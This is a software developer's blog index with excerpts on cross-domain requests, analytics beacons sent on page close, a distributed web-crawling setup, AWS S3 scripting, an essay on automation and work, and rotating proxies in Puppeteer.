Abusing image tags for cross domain requests

Posted on December 15, 2020 in Security • Tagged with cross-domain-requests, cors, browser • 3 min read

Cross domain requests with <img> tags are not bound to the same origin policy. I will shed light on several possibilities how malicious web site owners can potentially abuse cross domain request done with <img> and script tags created with JavaScript.


Continue reading

Reliable Cross Domain Requests when the User leaves the Page

Posted on December 10, 2020 in JavaScript • Tagged with navigator.sendBeacon(), visibilitychange, onbeforeunload, cross domain request • 7 min read

In this article, I demonstrate how to reliably communicate JSON data to a cross domain server after the user is about to end or interrupt the browsing session by either:

  • switching the focus to another page
  • switching from the browser to another applicaton
  • closing the tab
  • closing the browser

or any other means of terminating or interrupting the current browsing session. Mobile devices and desktop devices should be equally supported.

Why do I have this very specific requirement?

I am in the process of developing a JavaScript analytics application and I need to record user interactions and send those user interactions from any website to my remote server.

Put differently: I need to record user interactions up until the point where the user leaves the browsing session. The ideal event for this scenario is to attach an event listener to visibilitychange:

document.addEventListener("visibilitychange", function() {
  if (document.visibilityState === 'hidden') {
    localStorage.setItem('triggeredOnPageClose', new Date());
  }
})

This event fires when the user loses focus of the current window and the page visiblity becomes hidden, for example when the user changes the tab.

However, is the above event also triggered when the user closes the page or closes the entire browser? In order …


Continue reading

Crawling Infrastructure - Introduction

Posted on May 18, 2020 in Crawling • Tagged with Crawling, Distributed Computing, Cloud, Web Bots • 6 min read

In this blog article I will introduce my most recent project: The distributed crawling infrastructure which allows to crawl any website with a low-level Http library or a fully fledged chrome browser configured to evade bot detection attempts.

This introduction is divided into three distinct blog articles, because one blog article would be too large to cover this huge topic.

  1. (This article) The first part of the series motivates the development of the crawling infrastructure, introduces the architecture of the software and demonstrates how the crawling backend works at a high level.
  2. The second part covers the installation of the distributed crawling infrastructure within the AWS cloud infrastructure and tests the freshly deployed stack with a test crawl task.
  3. In the third part of this tutorial series, a crawl task with the top 10.000 websites of the world is created. The downloaded Html documents are stored in s3. For the top 10.000 websites, we use the scientific tranco list: A Research-Oriented top sites ranking hardened against manipulation. As a concluding task, we run business logic on the stored Html files. For example, we extract all urls from the Html documents or we run analytics on the <meta> tags …

Continue reading

Dynamic creation of S3 buckets in many regions

Posted on February 26, 2020 in Scripts • Tagged with AWS, S3, Buckets • 1 min read

Quick script that demonstrates how to create s3 buckets in many regions.


Continue reading

The value of work in the coming decades

Posted on February 20, 2020 in Society • Tagged with Digitalization, Society, automation, Second-Machine-Age, Work • 12 min read

This article makes an attempt to understand and predict the consequences of the rapid automation/computerization in the realm of human work. I make them based on my experiences as a software engineer, while I am fully aware that programming is not threatened to be eradicated by automation in the next decades. For that reason, I realize that I am holding a privileged position.

In the second part of the article, I argue why work in general should be voluntary within a welfare state and why the governments main task should be to create a situation where humans dont' have to work in order to obtain the bare essentials such as housing, food and healthcare.

What is work?

So what exactly is work? Work is something that sucks, right? After all, if I could spend my time without having to worry about finances, I'd rather spend my days at a tropic beach drinking some beers and doing exactly nothing.

But for how long? When would my natural urge to be productive kick in? I assume that after a couple of days, I would start a project that consumes my time. But since I don't have to worry about it's financial …


Continue reading

How to dynamically change http/s proxy servers in puppeteer?

Posted on February 14, 2020 in Scraping • Tagged with Puppeteer, Proxies, Issues, Proxy-Authentication • 5 min read

Find the updated blog post here.

Chrome/Puppeteer has a couple of annoying issues when trying to use http/s proxies and socks proxies with the chrome browser controlled by puppeteer. The most pressing issues are the following:

  1. Dynamically changing proxy servers: Once the chrome browser is started, it is not possible to change the proxy configuration any longer. A restart is required to switch proxy configuration.
  2. user/pass proxy authentication: The chrome browser does not support username/password proxy authentication for socks proxies. Puppeteer supports the http proxy authentication via the page.authenticate() function, but it does not have an equivalent for socks proxies.
  3. Per page proxies: Per page proxies are not supported with the chrome browser. The global proxy configuration applies to all pages and windows of a launched chrome process. It seems like the new module tries to solve this issue.

For my purposes, I don't really care about problem 3). I don't need per page proxies anyway, since the crawling software I write runs with one browser tab at the time. However, issue 1) is a mandatory requirement for me and thus needs to be solved.

The reason is, I don't want to restart the browser …


Continue reading